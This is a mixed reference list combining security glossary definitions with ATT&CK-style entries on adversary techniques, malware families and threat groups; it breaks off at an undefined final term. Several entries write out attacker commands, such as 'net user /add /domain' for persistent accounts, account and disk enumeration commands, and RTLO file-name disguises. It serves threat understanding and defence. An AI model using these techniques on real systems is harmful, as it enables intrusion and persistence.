Description: Operation Spalax was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The Operation Spalax threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to APT-C-36, however identified enough differences to report this as separate, unattributed activity.

Term: Threat Assessment/Analysis
Definition: Formal description and evaluation of threat to a system or organization.

Term: Network Extension
Definition: A method of providing partial or complete network access to remote users.

Term: Analysis Approach
Definition: The approach used to define the orientation or starting point of the risk assessment, the level of detail in the assessment, and how risks due to similar threat scenarios are treated.

Term: Object, Assessment
Definition: The item (i.e., specifications, mechanisms, activities, individuals) upon which an assessment method is applied during an assessment.

Term: boundary protection device
Definition: A device with appropriate mechanisms that: (i) facilitates the adjudication of different interconnected system security policies (e.g., controlling the flow of information into or out of an interconnected system); and/or (ii) provides information system boundary protection.

Name: Right-to-Left Override
Type: attack-pattern
Description: Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.

Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity. RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

Term: Secure Sockets Layer (SSL)
Definition: See Transport Layer Security (TLS).

Term: Informative References
Definition: A relationship between a Reference Document and the NIST Cybersecurity Framework, using the OLIR Template.

Term: Base layer
Definition: The underlying layer of an image upon which all other components are added.

Term: Function
Definition: A component of the Core that provides the highest level of structure for organizing basic privacy activities into Categories and Subcategories.

Term: Encapsulating Security Payload (ESP)
Definition: The core IPsec security protocol; can provide integrity protection and (optionally) encryption protection for packet headers and data.

Name: Domain Account
Type: attack-pattern
Description: Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Term: Assessment Timeliness
Definition: The degree to which the continuous monitoring-generated, security-related information is collected within the specified period of time (or frequency).

Term: Cryptographic service
Definition: A service that provides confidentiality, integrity, source authentication, entity authentication, non-repudiation support, access control and availability (e.g., encryption and decryption, and digital signature generation and verification).

Term: HVA
Definition: Those assets, federal information systems, information, and data for which an unauthorized access, use, disclosure, disruption, modification, or destruction could cause a significant impact to the United States' national security interests, foreign relations, economy – or to the public confidence, civil liberties, or public health and safety of the American people.

Term: compromise
Definition: The unauthorized disclosure, modification, or use of sensitive data (e.g., keying material and other security-related information).

Term: Provider
Definition: A party that provides (1) a public key (e.g., in a certificate); (2) assurance, such as an assurance of the validity of a candidate public key or assurance of possession of the private key associated with a public key; or (3) key confirmation. Contrast with recipient.

Name: Standard Encoding
Type: attack-pattern
Description: Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip.

Term: assurance
Definition: In the context of OMB M-04-04 and this document, assurance is defined as 1) the degree of confidence in the vetting process used to establish the identity of an individual to whom the credential was issued, and 2) the degree of confidence that the individual who uses the credential is the individual to whom the credential was issued.

Term: sanitization
Definition: Process to remove information from media such that data recovery is not possible.

Term: Auditor
Definition: An FCKMS role that is responsible for establishing and reviewing an audit log, assuring that the log is reviewed periodically and after any security-compromise-relevant event, and providing audit reports to FCKMS managers.

Name: TrailBlazer
Type: malware
Description: TrailBlazer is a modular malware that has been used by APT29 since at least 2019.

Term: Fair Information Practice Principles
Definition: a set of principles that have been developed world-wide since the 1970s that provide guidance to organizations in the handling of personal data

Term: Key-derivation procedure
Definition: As used in this Recommendation, a multi-step process to derive secret keying material from a shared secret and other information.

Term: Normalization
Definition: The conversion of information into consistent representations and categorization.

Name: Industroyer2
Type: malware
Description: Industroyer2 is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in Industroyer. Security researchers assess that Industroyer2 was designed to cause impact to high-voltage electrical substations. The initial Industroyer2 sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.

Term: Biometric Characteristic
Definition: Biological attribute of an individual from which distinctive and repeatable values can be extracted for the purpose of automated recognition. Fingerprint ridge structure and face topography are examples of biometric characteristics.

Term: destroy
Definition: A method of sanitization that renders target data recovery infeasible using state-of-the-art laboratory techniques and results in the subsequent inability to use the media to store data.

Term: Rekey
Definition: To change the value of a cryptographic key that is being used in a cryptographic system application; this normally entails issuing a new certificate on the new public key. NIST SP 800-32 under Re-key (a certificate)

Term: key-wrap algorithm
Definition: A deterministic, symmetric-key authenticated-encryption algorithm that is intended for the protection of cryptographic keys. Consists of two functions: authenticated encryption and authenticated decryption.

Term: False Match Rate (FMR)
Definition: The proportion of zero-effort impostor attempt samples falsely declared to match the compared non-self template

Term: System Management Mode (SMM)
Definition: A high-privilege operating mode found in x86-compatible processors used for low-level system management functions. System Management Mode is only entered after the system generates a System Management Interrupt and only executes code from a segregated block of memory.

Name: Blue Mockingbird
Type: intrusion-set
Description: Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.

Name: Line Dancer
Type: malware
Description: Line Dancer is a memory-only Lua-based shellcode loader associated with the ArcaneDoor campaign. Line Dancer allows an adversary to upload and execute arbitrary shellcode on victim devices.

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol widely implemented in browsers and web servers. SSL has been superseded by the newer Transport Layer Security (TLS) protocol; TLS 1.0 is effectively SSL version 3.1.

Name: JamPlus
Type: attack-pattern
Description: Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.

Adversaries may abuse the `JamPlus` build utility to execute malicious scripts via a `.jam` file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.

Term: authenticate
Definition: the process of verifying the integrity of data that has been stored, transmitted, or otherwise exposed to possible unauthorized access.

Name: Invoke-PSImage
Type: tool
Description: Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords.

Name: Python
Type: attack-pattern
Description: Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Term: party
Definition: item inside or outside an information and communication technology system, such as a person, an organization, a device, a subsystem, or a group of such items that has recognizably distinct existence

Term: Master key
Definition: See Key-derivation key.

Term: KDM
Definition: A method used to derive keying material from initial shared secrets and possibly other information.

Term: Cryptographic hash function
Definition: See Hash function.

Term: security configuration management (SecCM)
Definition: The management and control of configurations for an information system to enable security and facilitate the management of risk.

Name: Putter Panda
Type: intrusion-set
Description: Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD).

Name: Exploitation for Stealth
Type: attack-pattern
Description: Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. 

Adversaries may exploit a system or application vulnerability to avoid detection while maintaining access within an environment. Exploitation occurs when an adversary leverages a programming flaw to execute code in a manner that minimizes visibility or blends in with legitimate activity. 

Rather than directly disabling defenses, adversaries may use exploitation to circumvent monitoring and logging mechanisms. This can include abusing vulnerabilities in logging pipelines, security tools, or cloud infrastructure to evade audit trails, suppress alerts, or operate without generating telemetry. 

Adversaries may identify these opportunities through prior reconnaissance or by performing discovery of security controls after initial access. In some cases, vulnerabilities in SaaS or public cloud environments may be exploited to evade logging, obscure activity, or deploy infrastructure that remains hidden from standard monitoring tools.

Term: FIREFLY credential manager
Definition: The key management entity (KME) responsible for removing outdated modern key credentials from the directory servers.

Term: <em>GHASHH (X)</em>
Definition: The output of the GHASH function under the hash subkey H applied to the bit string X.

Term: schema
Definition: An object's defined organization and structure, including the syntax, semantics, and metadata about each field in the structure.

Term: SCAP conformant
Definition: A product or SCAP data stream that meets the requirements of this specification.

Name: Get2
Type: malware
Description: Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.

Term: CSF Tier
Definition: A characterization of the rigor of an organization’s cybersecurity risk governance and management practices. There are four Tiers: Partial (Tier 1), Risk Informed (Tier 2), Repeatable (Tier 3), and Adaptive (Tier 4).

Term: Integrity protection
Definition: The process of providing assurance that data has not been modified since a message authentication code or digital signature was created for that data.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: message digest
Definition: The result of applying a hash function to a message

Term: CUI categories
Definition: Those types of information for which laws, regulations, or government-wide policies require or permit agencies to exercise safeguarding or dissemination controls and which the CUI Executive Agent has approved and listed in the CUI Registry.

Term: senior agency official for privacy
Definition: The senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: encrypted key
Definition: A cryptographic key that has been encrypted using an approved cryptographic algorithm in order to disguise the value of the underlying plaintext key.

Term: Suspended state
Definition: A lifecycle state of a key whereby the use of the key for applying cryptographic protection has been temporarily suspended.

Term: privacy control baseline
Definition: A collection of controls specifically assembled or brought together by a group, organization, or community of interest to address the privacy protection needs of individuals.

Term: Enrollment
Definition: The process of making a person’s identity known to the PIV system, associating a unique identifier with that identity, and collecting and recording the person’s relevant attributes into the system.

Term: Automated Checklist
Definition: A checklist that is used through one or more tools that automatically alter or verify settings based on the contents of the checklist. Automated checklists document their security settings in a machine-readable format, either standard or proprietary.

Term: survivability
Definition: The ability of a system to minimize the impact of a finite- duration disturbance on value delivery (i.e., stakeholder benefit at cost), achieved through the reduction of the likelihood or magnitude of a disturbance; the satisfaction of a minimally acceptable level of value delivery during and after a disturbance; and/or a timely recovery.

Term: senior agency official for privacy
Definition: Senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy; management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: susceptibility
Definition: The inability to avoid adversity.

Term: Information System Contingency Plan (ISCP)
Definition: See Information System Contingency Plan.

Term: SwA
Definition: The level of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its life cycle, and that the software functions as intended by the purchaser or user.

Term: <em>Key management product</em>
Definition: A symmetric or asymmetric cryptographic key, a public-key certificate and other related items (such as domain parameters, IVs, random numbers, certificate revocation lists and compromised key lists, and tokens) that are obtained by a trusted means from some source.

Term: SSO
Definition: An authentication process by which one account and its authenticators are used to access multiple applications in a seamless manner, generally implemented with a federation protocol.

Name: Proxy
Type: attack-pattern
Description: Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

Term: AVP
Definition: A tuple a=v in which a (the attribute) is an alphanumeric label representing a property or state, and v (the value) is the value assigned to the attribute.

Term: Image
Definition: A file or directory that contains, at a minimum, the encapsulated components of a guest OS.

Term: Security Association Database (SAD)
Definition: A list or table of all IPsec SAs, including those that are still being negotiated.

Name: COR_PROFILER
Type: attack-pattern
Description: Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a Component Object Model (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: Bypass User Account Control) if the victim .NET process executes at a higher permission level, as well as to hook and impair defenses provided by .NET processes.

Name: LoFiSe
Type: malware
Description: LoFiSe has been used by ToddyCat since at least 2023 to identify and collect files of interest on targeted systems.

Term: SCA
Definition: The individual, group, or organization responsible for conducting a security control assessment.

Term: AAL
Definition: A list of applications and application components (libraries, configuration files, etc.) that are authorized to be present or active on a host according to a well-defined baseline.

Term: recover (CSF function)
Definition: Develop and implement the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event.

Term: provisioning API
Definition: A protected API that allows an RP to access identity attributes for multiple subscribers for the purposes of provisioning and managing RP subscriber accounts.

Term: OS
Definition: The software “master control application” that runs the computer. It is the first program loaded when the computer is turned on, and its main component, the kernel, resides in memory at all times. The operating system sets the standards for all application programs (such as the Web server) that run in the computer. The applications communicate with the operating system for most user interface and file management operations.

Term: Wireless Fidelity (WiFi)
Definition: a generic term that refers to a wireless local area network that observes the IEEE 802.11 protocol.

Term: <em>gir</em>
Definition: DH key exchange value, also called a DH shared secret (in IKE version 2).

Term: supplier
Definition: Organization or an individual that enters into an agreement with the acquirer for the supply of a product or service.

Term: baseline
Definition: Hardware, software, and relevant documentation for an information system at a given point in time.

Term: public key certificate
Definition: See public-key certificate.

Term: O
Definition: Output Block

Name: AcidPour
Type: malware
Description: AcidPour is a variant of AcidRain designed to impact a wider range of x86 architecture Linux devices. AcidPour is an x86 ELF binary that expands on the targeted devices and locations in AcidRain by including items such as Unsorted Block Image (UBI), Deice Mapper (DM), and various flash memory references. Based on this expanded targeting, AcidPour can impact a variety of device types including IoT, networking, and ICS embedded device types. AcidPour is a wiping payload associated with the Sandworm Team threat actor, and potentially linked to attacks against Ukrainian internet service providers (ISPs) in 2023.

Term: Activation/Issuance
Definition: A process that includes the procurement of FIPS-approved blank PIV Cards or hardware/software tokens (for Derived PIV Credential), initializing them using appropriate software and data elements, personalization of these cards/tokens with the identity credentials of authorized subjects, and pick-up/delivery of the personalized cards/tokens to the authorized subjects, along with appropriate instructions for protection and use.

Term: Integrator
Definition: An organization that customizes (e.g., combines, adds, optimizes) elements, processes, and systems. The integrator function can be performed by acquirer, integrator, or supplier organizations.

Name: System Shutdown/Reboot
Type: attack-pattern
Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. <code>reload</code>). They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools.

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may also use Windows API functions, such as `InitializeSystemShutdownExW` or `ExitWindowsEx`, to force a system to shut down or reboot. Alternatively, the `NtRaiseHardError`or `ZwRaiseHardError` Windows API functions with the `ResponseOption` parameter set to `OptionShutdownSystem` may deliver a “blue screen of death” (BSOD) to a system. In order to leverage these API functions, an adversary may need to acquire `SeShutdownPrivilege` (e.g., via Access Token Manipulation).
 In some cases, the system may not be able to boot again. 

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.

Term: SP
Definition: Microsoft’s term for a collection of patches integrated into a single large update.

Term: keying material
Definition: A binary string, such that any non-overlapping segments of the string with the required lengths can be used as symmetric cryptographic keys.

Name: LazyScripter
Type: intrusion-set
Description: LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.

Term: linked information
Definition: Information about or related to an individual that is logically associated with other information about the individual.

Term: access control
Definition: The process of granting or denying specific requests to 1) obtain and use information and related information processing services and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).

Term: monitoring
Definition: Continual checking, supervising, critically observing or determining the status in order to identify change from the performance level required or expected.

Term: Mitigate
Definition: To make less severe or painful or to cause to become less harsh or hostile.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact operations (including mission function, image, or reputation), agency assets or individuals through an information system via unauthorized access, destruction, disclosure, modification of data, and/or denial of service.

Term: key management
Definition: The activities involved in the handling of cryptographic keys and other related security parameters (e.g., initialization vectors (IVs) and passwords) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output, and destruction.

Term: Authentication Key
Definition: A public key that a DNSSEC-aware resolver has verified and can therefore use to authenticate data. A DNSSEC-aware resolver can obtain authentication keys in three ways. First, the resolver generally is configured to know about at least one public key; this configured data usually is either the public key itself or a hash of the public key as found in the DS RR (see “trust anchor”). Second, the resolver may use an authenticated public key to verify a DS RR and the DNSKEY RR to which the DS RR refers. Third, the resolver may be able to determine that a new public key has been signed by the private key corresponding to another public key that the resolver has verified. Note that the resolver must always be guided by local policy in deciding whether to authenticate a new public key, even if the local policy is simply to authenticate any new public key for which the resolver is able verify the signature.

Term: cryptographic module
Definition: A set of hardware, software, or firmware that implements approved security functions, including cryptographic algorithms and key generation.

Term: Network Access Control (NAC)
Definition: A feature provided by some firewalls that allows access based on a user’s credentials and the results of health checks performed on the telework client device.

Term: subscriber
Definition: An individual applying for a Derived PIV Credential

Term: Key registration
Definition: A function in the lifecycle of keying material; the process of officially recording the keying material by a registration authority.

Term: NFIQ
Definition: NIST Fingerprint Image Quality – an automated algorithm for quantifying good fingerprint images; available as open-source.

Name: Tropic Trooper
Type: intrusion-set
Description: Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.

Term: Lempel-Ziv Complexity Test
Definition: The purpose of the test is to determine how far the tested sequence can be compressed. The sequence is considered to be non-random if it can be significantly compressed

Term: hash value/result
Definition: See “Hash value”.

Term: Tier 0 (central facility) (COMSEC)
Definition: The composite facility approved, managed, and operated under National Security Agency (NSA) oversight that includes: 
a. National COMSEC Material Generation and Production facilities for physical and electronic keys, both traditional and modern. 
b. Central Office of Record (COR) services for NSA, contractor, and select Civil Agency accounts. 
c. National Distribution Authority (NDA) for U.S. accounts worldwide. 
d. National Registration Authority for all non-military accounts on U.S. systems. 
e. National Credential Manager for all electronic key management system (EKMS) accounts on U.S. systems. 
f. EKMS Defense Courier Service (DCS) data administrator.

Term: Desired State Specification
Definition: See Desired State Specification.

Term: IC
Definition: The term 'intelligence community' refers to the following agencies or organizations:
(1) The Central Intelligence Agency (CIA);
(2) The National Security Agency (NSA);
(3) The Defense Intelligence Agency (DIA);
(4) The offices within the Department of Defense for the collection of specialized national foreign intelligence through reconnaissance programs;
(5) The Bureau of Intelligence and Research of the Department of State;
(6) The int elligence elements of the Army, Navy, Air Force, and Marine Corps, the Federal Bureau of Investigation (FBI), the Department of the Treasury, and the Department of Energy; and
(7) The staff elements of the Director of Central Intelligence.

Term: organizational user
Definition: An organizational employee or an individual the organization deemed to have similar status of an employee including, for example, contractor, guest researcher, or individual detailed from another organization.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system.
Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: Integrity protection
Definition: A physical or cryptographic means of providing assurance that information has not been altered in an unauthorized manner since it was created, transmitted, or stored.

Term: Initialization Vector (IV)
Definition: A vector used in defining the starting point of an encryption process within a cryptographic algorithm.

Term: PIV Enrollment Record
Definition: A sequence of related enrollment data sets that is created and maintained by PIV Card issuers. The PIV enrollment record typically contains data collected at each step of the PIV identity proofing, registration, and issuance processes.

Name: LiteDuke
Type: malware
Description: LiteDuke is a third stage backdoor that was used by APT29, primarily in 2014-2015. LiteDuke used the same dropper as PolyglotDuke, and was found on machines also compromised by MiniDuke.

Term: retirement
Definition: Withdrawal of active support by the operation and maintenance organization, partial or total replacement by a new system, or installation of an upgraded system.

Term: Log
Definition: A record of the events occurring within an organization’s systems and networks.

Term: DPC
Definition: An X.509 Derived PIV Authentication certificate, which is issued in accordance with the requirements specified in this document where the PIV Authentication certificate on the Applicant’s PIV Card serves as the original credential. The Derived PIV Credential is an additional common identity credential under HSPD-12 and FIPS 201 that is issued by a Federal department or agency and that is used with mobile devices.

Term: Chief Privacy Officer
Definition: The senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy; management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: cyber resiliency control
Definition: A security or privacy control as defined in [NIST SP 800-53] which requires the use of one or more cyber resiliency techniques or implementation approaches, or which is intended to achieve one or more cyber resiliency objectives.

Term: token
Definition: See Authenticator

Term: SAISO
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Modernization Act FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses. 
Note 2: Organizations subordinate to federal agencies may use the term Senior Agency Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: metrics
Definition: Measures and assessment results designed to track progress, facilitate decision-making, and improve performance with respect to a set target.

Term: Geolocation
Definition: Determining the approximate physical location of an object, such as a cloud computing server.

Term: GPS
Definition: The Global Positioning System (GPS) is a U.S.-owned utility that provides users with positioning, navigation, and timing (PNT) services. This system consists of three segments: the space segment, the control segment, and the user segment. The U.S. Space Force develops, maintains, and operates the space and control segments.

Term: Key-derivation method
Definition: A key-derivation function or other approved procedure for deriving keying material.

Name: RCSession
Type: malware
Description: RCSession is a backdoor written in C++ that has been in use since at least 2018 by Mustang Panda and by Threat Group-3390 (Type II Backdoor).

Name: Local Account
Type: attack-pattern
Description: Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the Net utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS, the <code>dscl . list /Users</code> command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.

Term: concept of operations
Definition: A security-focused description of a system, its operational policies, classes of users, interactions between the system and its users, and the system’s contribution to the operational mission.
Note 1: The security concept of operations may address security for other life cycle concepts associated with the deployed system. These include, for example, concepts for sustainment, logistics, maintenance, and training.
Note 2: Security concept of operations is not the same as concept for secure function. Concept for secure function addresses the design philosophy for the system and is intended to achieve a system that is able to be used in a trustworthy secure manner. The security concept of operations must be consistent with the concept for secure function.

Term: Information System User
Definition: Individual, or (system) process acting on behalf of an individual, authorized to access an information system. 
See Organizational User and Non-Organizational User.

Term: access profile
Definition: Association of a user with a list of protected objects the user may access.

Name: Cloud Account
Type: attack-pattern
Description: Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment. In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for Temporary Elevated Cloud Access. While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding Additional Cloud Credentials or assigning Additional Cloud Roles.

Name: Local Storage Discovery
Type: attack-pattern
Description: Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform Lateral Movement, or as a precursor to Direct Volume Access. 

On ESXi systems, adversaries may use Hypervisor CLI commands such as `esxcli` to list storage connected to the host as well as `.vmdk` files.

On Windows systems, adversaries can use `wmic logicaldisk get` to find information about local network drives. They can also use `Get-PSDrive` in PowerShell to retrieve drives and may additionally use Windows API functions such as `GetDriveType`.

Linux has commands such as `parted`, `lsblk`, `fdisk`, `lshw`, and `df` that can list information about disk partitions such as size, type, file system types, and free space. The command `diskutil` on MacOS can be used to list disks while `system_profiler SPStorageDataType` can additionally show information such as a volume’s mount path, file system, and the type of drive in the system. 

Infrastructure as a Service (IaaS) cloud providers also have commands for storage discovery such as `describe volume` in AWS, `gcloud compute disks list` in GCP, and `az disk list` in Azure.

Term: party
Definition: An individual (person), organization, device, or process. Used interchangeably with party.

Term: Inverse Cipher Function (Inverse Cipher Operation)
Definition: The function that reverses the transformation of the forward cipher function when the same cryptographic key is used.

Term: commodity service
Definition: A system service provided by a commercial service provider to a large and diverse set of consumers. The organization acquiring or receiving the commodity service possesses limited visibility into the management structure and operations of the provider, and while the organization may be able to negotiate service-level agreements, the organization is typically not able to require that the provider implement specific controls.

Term: IT
Definition: The term 'information technology', with respect to an executive agency means any equipment or interconnected system or subsystem of equipment, that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which (i) requires the use of such equipment, or (ii) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishing of a product. The term ''information technology'' includes computers, ancillary equipment, software, firmware and similar procedures, services (including support services), and related resources. The term ''information technology'' does not include any equipment that is acquired by a Federal contractor incidental to a Federal contract.

Term: UI
Definition: The physical or logical means by which users interact with a system, device or process.

Term: Instant Messaging (IM)
Definition: A facility for exchanging messages in real-time with other people over the Internet and tracking the progress of a given conversation.

Term: Card Verifiable Certificate
Definition: A certificate stored on the PIV Card that includes a public key, the signature of a certification authority, and further information needed to verify the certificate.

Term: Competency
Definition: A competency is a measurable pattern of knowledge, skills, abilities, behaviors, and other characteristics that an individual needs to perform work roles or occupational functions successfully. Competencies specify the “how” of performing job tasks, or what the person needs to do the job successfully.

Term: insider threat
Definition: The threat that an insider will use her/his authorized access, wittingly or unwittingly, to do harm to the security of United States. This threat can include damage to the United States through espionage, terrorism, unauthorized disclosure of national security information, or through the loss or degradation of departmental resources or capabilities.

Name: Server
Type: attack-pattern
Description: Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in Drive-by Compromise, enabling Phishing operations, or facilitating Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused. 

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.

Term: senior agency official for privacy
Definition: Person responsible for ensuring that an agency complies with privacy requirements, manages privacy risks, and considers the privacy impacts of all agency actions and policies that involve personal information.

Term: controlling domain
Definition: The domain that assumes the greater risk and thus enforces the most restrictive policy.

Term: senior accountable official for risk management
Definition: The senior official, designated by the head of each agency, who has vision into all areas of the organization and is responsible for alignment of information security management processes with strategic, operational, and budgetary planning processes.

Term: Pre-activation state
Definition: A key state in which the key has been generated but is not yet authorized for use.

Term: Mobile Device Management (MDM)
Definition: The administration of mobile devices such as smartphones, tablets, computers, laptops, and desktop computers. MDM is usually implemented through a third-party product that has management features for particular vendors of mobile devices.

Term: Skill
Definition: The capacity to perform an observable action.

Name: Winexe
Type: tool
Description: Winexe is a lightweight, open source tool similar to PsExec designed to allow system administrators to execute commands on remote servers. Winexe is unique in that it is a GNU/Linux based client.

Term: COMSEC training
Definition: Teaching of skills relating to COMSEC accounting and the use of COMSEC aids.

Term: NIDS
